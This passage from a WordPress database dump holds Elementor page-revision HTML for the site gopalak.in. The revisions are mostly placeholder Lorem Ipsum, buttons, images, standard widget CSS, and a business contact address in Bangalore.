ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 11:06:48','2022-10-03 05:36:48','',1373,'https://gopalak.in/?p=1521',0,'revision','',0),(1522,1,'2022-10-03 11:06:48','2022-10-03 05:36:48','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, 